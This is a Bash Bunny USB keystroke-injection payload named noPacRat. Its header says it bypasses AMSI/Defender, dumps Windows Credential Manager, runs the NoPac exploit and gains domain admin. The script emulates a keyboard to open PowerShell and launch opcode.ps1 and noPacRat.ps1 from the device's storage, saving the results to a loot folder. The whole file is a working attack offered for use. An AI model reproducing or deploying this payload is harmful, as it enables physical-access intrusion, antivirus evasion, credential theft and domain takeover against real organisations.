############################################################################################
# Name: noPacRat
# Purpose: Bypass AMSI/Defender, Dump Credential Manager, Run NoPac Exploit, Get DA.
# Version: 1.0
# Author: assume-breach
# Contact: twitter.com/assume-breach
# Based on dumpCredStore, my-am-bypass.ps1, invoke-nopac.ps1
# Date: 2022-03-19
#############################################################################################

#!/bin/bash

# Options
LOOTDIR=/root/udisk/loot/KatBurglar

######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
DUCKY_LANGUAGE us

######## MAKE LOOT DIRECTORY ########
mkdir -p $LOOTDIR

####### ATTACK #####
Q GUI r
Q DELAY 500
Q STRING powershell 
Q DELAY 500
Q ENTER
Q DELAY 500
Q STRING "cd ((gwmi win32_volume -f 'label=''BashBunny''').Name+'tools\')"
Q DELAY 500
Q ENTER
Q DELAY 500
Q STRING ".\opcode.ps1"
Q DELAY 500
Q ENTER
Q STRING "cd ((gwmi win32_volume -f 'label=''BashBunny''').Name+'tools\noPacRat\')"
Q DELAY 500
Q ENTER 
Q DELAY 500
Q STRING ".\noPacRat.ps1"
Q DELAY 500
Q ENTER
Q DELAY 38000
